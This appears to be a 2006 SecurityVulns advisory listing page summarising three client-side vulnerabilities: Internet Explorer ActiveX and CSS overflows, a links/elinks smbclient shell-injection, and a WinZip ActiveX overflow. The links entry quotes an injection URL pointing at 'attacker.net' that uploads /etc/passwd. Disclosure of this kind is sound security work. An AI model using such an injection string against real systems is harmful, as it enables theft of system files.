Computer Security

Search:Vulnerability:15.11.2006
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Microsoft Windows daxctle.ocx and HTML parsing buffer overflows
updated since 13.09.2006
Published:15.11.2006
Source:BUGTRAQ
SecurityVulns ID:6614
Type:client
Level:9/10
Description:DirectAnimation.PathControl ActiveX control KeyFrame method heap overflow. Buffer overflow in CSS Floatproperty. May be used for hidden malware installation.
Affected:MICROSOFT : Windows 2000 Server
 MICROSOFT : Windows 2000 Professional
 MICROSOFT : Windows XP
 MICROSOFT : Windows 2003 Server
Original documentdocumentZDI, [Full-disclosure] ZDI-06-041: Microsoft Internet Explorer CSS Float Property Memory Corruption Vulnerability (15.11.2006)
 documentMICROSOFT, Microsoft Security Bulletin MS06-067 Cumulative Security Update for Internet Explorer (922760) (14.11.2006)
Files:Internet Explorer COM Object Heap Overflow Download Exec Exploit
 Microsoft Security Bulletin MS06-067 Cumulative Security Update for Internet Explorer (922760)
Discuss:Read or add your comments to this news (0 comments)

links browser shell characters vulnerability
Published:15.11.2006
Source:FULL-DISCLOSURE
SecurityVulns ID:6828
Type:client
Level:6/10
Description:Shell characters problem on external smbclient execution with URLs like 'smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; '
Affected:LINKS : links 1.0
 ELINKS : elinks 0.11
Original documentdocumentTeemu Salmela, [Full-disclosure] Links smbclient command execution (15.11.2006)
Discuss:Read or add your comments to this news (0 comments)

WinZip ActiveX buffer overflow
updated since 15.11.2006
Published:03.01.2007
Source:BUGTRAQ
SecurityVulns ID:6829
Type:client
Level:6/10
Description:Buffer overflow in WZFILEVIEW.FileViewCtrl.61 element.
Affected:WINZIP : WinZip 10.0
Original documentdocument76693223_(at)_163.com, WinZip FileView ActiveX controls CreateNewFolderFromName Method Buffer Overflow Vulnerability (03.01.2007)
 document76693223_(at)_163.com, WinZip10.0 FileView ActiveX Controls CreateNewFolderFromName Method Buffer overflow (03.01.2007)
 documentMicheal Turner, Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability (15.11.2006)
 documentZDI, ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability (15.11.2006)
Files:WinZip <= 10.0.7245 FileView ActiveX Buffer Overflow Exploit v2
 WinZip <= 10.0.7245 FileView ActiveX buffer overflow exploit
 Exploits WinZip FileView ActiveX controls CreateNewFolderFromName Method Buffer Overflow Vulnerability
Discuss:Read or add your comments to this news (0 comments)
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru